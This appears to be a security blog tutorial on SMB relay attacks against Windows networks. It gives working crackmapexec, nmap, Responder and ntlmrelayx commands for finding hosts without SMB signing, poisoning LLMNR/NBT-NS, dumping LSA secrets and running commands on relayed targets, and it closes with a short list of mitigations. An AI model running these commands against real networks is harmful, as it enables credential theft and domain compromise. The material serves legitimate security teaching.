💥 Exploit Studies

SMB Relay Attacks: From Network Capture to Domain Compromise

March 30, 202612 min read1,923 views
SMB Relay Attacks: From Network Capture to Domain Compromise

SMB Relay Attacks: Network to Domain Compromise

SMB relay attacks exploit the NTLM authentication protocol to forward captured credentials to other services, achieving lateral movement without knowing the actual password.

Prerequisites

  • SMB signing must be disabled or not required on the target
  • The relayed user must have admin privileges on the target
  • The target must be different from the source (no self-relay)

Phase 1: Identify Targets Without SMB Signing

# Scan for hosts with SMB signing disabled
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt

Alternative using Nmap


nmap --script smb2-security-mode -p445 10.10.10.0/24

Phase 2: LLMNR/NBT-NS Poisoning

# Configure Responder (disable SMB and HTTP servers)
sudo vim /etc/responder/Responder.conf
# Set SMB = Off, HTTP = Off

Start Responder for poisoning


sudo responder -I eth0 -dwPv

Phase 3: Relay Attack

# Relay captured NTLM hashes to targets
sudo ntlmrelayx.py -tf targets.txt -smb2support

Relay with SAM dump


sudo ntlmrelayx.py -tf targets.txt -smb2support --dump-lsa


Relay with command execution


sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami /all"

Mitigation

  • Enable SMB signing on all Windows hosts via GPO
  • Disable LLMNR and NBT-NS via Group Policy
  • Implement network segmentation to limit lateral movement
  • Deploy EDR solutions to detect relay tool signatures
SMBPrivilege EscalationNetwork SecurityKali Linux

Related Lab Tools

Completedutility🛡️ Original

SentinelX

SentinelX is an open-source Python cybersecurity tool for SOC analysis, reconnaissance processing, and MITRE ATT&CK mapping, generating structured security reports for ethical learning and research.

Related Research

← Back to Blog